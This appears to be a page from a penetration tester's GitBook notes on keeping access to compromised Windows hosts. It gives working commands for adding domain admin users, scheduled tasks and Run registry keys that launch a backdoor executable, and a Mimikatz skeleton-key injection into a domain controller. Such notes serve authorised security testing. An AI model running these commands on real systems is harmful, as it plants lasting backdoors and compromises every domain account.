Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • Guides
  • Add User
  • Scheduled task
  • SharpPresist
  • PowerShell
  • Command Line
  • Registry Key
  • SharpPresist:
  • Command Line
  • Accessibility Features
  • Silver Tickets
  • Skeleton Key

Was this helpful?

  1. Infrastructure testing
  2. Presistance

Windows

PreviousPresistanceNextPivoting

Last updated 4 years ago

Was this helpful?

Guides

3 good guides:

Add User

Commands:

net user "username" "password" /ADD

net group "Domain Admins" %username% /DOMAIN /ADD

Change user password

net user USERNAME *

Using Powershell:

Add-LocalGroupMember -Group Administrators -Member hacker

Scheduled task

SharpPresist

Create a Scheduled task:

Execute-assembly ~/Downloads/SharPersist.exe -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c echo 123 >> c:\123.txt" -n "Some Task" -m add -o hourly

Or

SharPersist -t schtask -c "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" -a "C:\Users\John\msbuild.csproj" -n "Test" -m add -o hourly

Delete a Scheduled task:

SharPersist -t schtask -n "Test" -m remove

PowerShell

PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" 
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" 
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" 
PS C:\> $S = New-ScheduledTaskSettingsSet 
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S 
PS C:\> Register-ScheduledTask Backdoor -InputObject $D 

Command Line

shell schtasks /create /tn Test /tr "c:\windows\system32\cmd.exe /c c:\Users\JOHN\Downloads\backdoor.exe" /sc onlogon /ru System

Registry Key

SharpPresist:

Create a Registry Key:

SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

Delete a Registry Key:

SharPersist -t reg -k "hkcurun" -v "Test Stuff" -m remove

Command Line

shell reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Test /t REG_SZ /d "C:\Windows\System32\cmd.exe"

Delete:

reg delete Registry_key_path /v Registry_value_name

Accessibility Features

The accessibility features provide additional options (on screen keyboards, magnifier, screen reading etc.) that could assist people with disabilities to use Windows operating systems easier. However, this functionality can be abused to achieve persistence on a host that RDP is enabled and Administrator level privileges have been obtained. This technique touches the disk, or modification of the registry is required to execute a stored remotely payload.

Silver Tickets

Computers change their account passwords every 30 days, but this is initialized by the client, not Active Directory. extract the host computer account hash, set a specific registry key, and you can regain access indefinitely.

Skeleton Key

The method injects itself into LSASS and creates a master password that will work for any account in the domain.

  • The Skeleton Key only works for Kerberos RC4 encryption

  • The Skeleton Key is a backdoor that runs on the Domain Controller (in memory) allows single password (the skeleton password) that can be used to log on to any account;

Run it on a DC using Mimikatz:

privilege::debug
misc::skeleton

https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-1-microsoft-office/
https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-2-com-hijacking/
https://www.mdsec.co.uk/2019/05/persistence-the-continued-or-prolonged-existence-of-something-part-3-wmi-event-subscription/
https://github.com/fireeye/SharPersist
https://github.com/fireeye/SharPersist
https://pentestlab.blog/2019/11/13/persistence-accessibility-features/
https://pentestlab.blog/2018/04/10/skeleton-key/